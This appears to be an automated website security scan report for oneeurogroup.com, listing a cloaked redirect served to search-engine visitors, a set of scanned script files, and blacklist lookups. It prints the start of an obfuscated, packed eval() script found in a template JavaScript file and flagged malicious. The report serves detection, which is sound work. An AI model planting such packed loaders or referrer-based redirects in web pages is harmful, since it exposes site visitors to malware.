Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://oneeurogroup.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: oneeurogroup.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 07 Sep 2014 15:53:31 GMT Location: http://www.caribsoft-online.biz/templates/rhuk_solarflare_ii/images/index.php Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.10-1ubuntu3.13 | malicious |
Scanned pages/files
Request | Server response | Status |
http://oneeurogroup.com/ | 200 OK Content-Length: 100917 Content-Type: text/html | clean |
http://oneeurogroup.com/components/com_gantry/js/mootools-1.2.5.js | 200 OK Content-Length: 122293 Content-Type: application/javascript | clean |
http://oneeurogroup.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://code.jquery.com/jquery-1.6.2.min.js | 200 OK Content-Length: 91556 Content-Type: application/x-javascript | clean |
http://oneeurogroup.com/modules/mod_oem_product_slider/scripts/slider.js | 200 OK Content-Length: 2360 Content-Type: application/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://oneeurogroup.com/modules/mod_nivoslider/assets/jquery.nivo.slider.js | 200 OK Content-Length: 15921 Content-Type: application/javascript | clean |
http://oneeurogroup.com/plugins/system/rokbox/rokbox-mt1.2.js | 200 OK Content-Length: 21695 Content-Type: application/javascript | clean |
http://oneeurogroup.com/plugins/system/rokbox/themes/light/rokbox-config.js | 200 OK Content-Length: 2598 Content-Type: application/javascript | clean |
http://oneeurogroup.com/media/widgetkit/js/jquery.js | 200 OK Content-Length: 95228 Content-Type: application/javascript | clean |
http://oneeurogroup.com/cache/widgetkit/widgetkit-bbef384b.js | 200 OK Content-Length: 13384 Content-Type: application/javascript | clean |
http://oneeurogroup.com/templates/rt_hybrid_j15/js/gantry-slidingpanel-mt1.2.js | 200 OK Content-Length: 1848 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(f(){2.1e=8 1c({1b:[1a,19],3:{z:16,s:\'14\',k:p.11.10.Z,n:\'X-W\',G:0,d:[\'S\',\'R\']},Q:f(a,b){C c=a;a=L.h(a)||J;6(!a)Y;6(!a)o 8 m(\'"\'+c+\'" I K M. :(\');2.N=a;2.4=a Antivirus reports:
| ||
http://oneeurogroup.com/components/com_gantry/js/gantry-buildspans-mt1.2.js | 200 OK Content-Length: 1094 Content-Type: application/javascript | clean |
http://oneeurogroup.com/components/com_gantry/js/gantry-inputs-mt1.2.js | 200 OK Content-Length: 3070 Content-Type: application/javascript | clean |
http://oneeurogroup.com/templates/rt_hybrid_j15/js/rt-fixedfooter.js | 200 OK Content-Length: 764 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oneeurogroup.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oneeurogroup.com/
Result: oneeurogroup.com is not infected or malware details are not published yet.
Result: oneeurogroup.com is not infected or malware details are not published yet.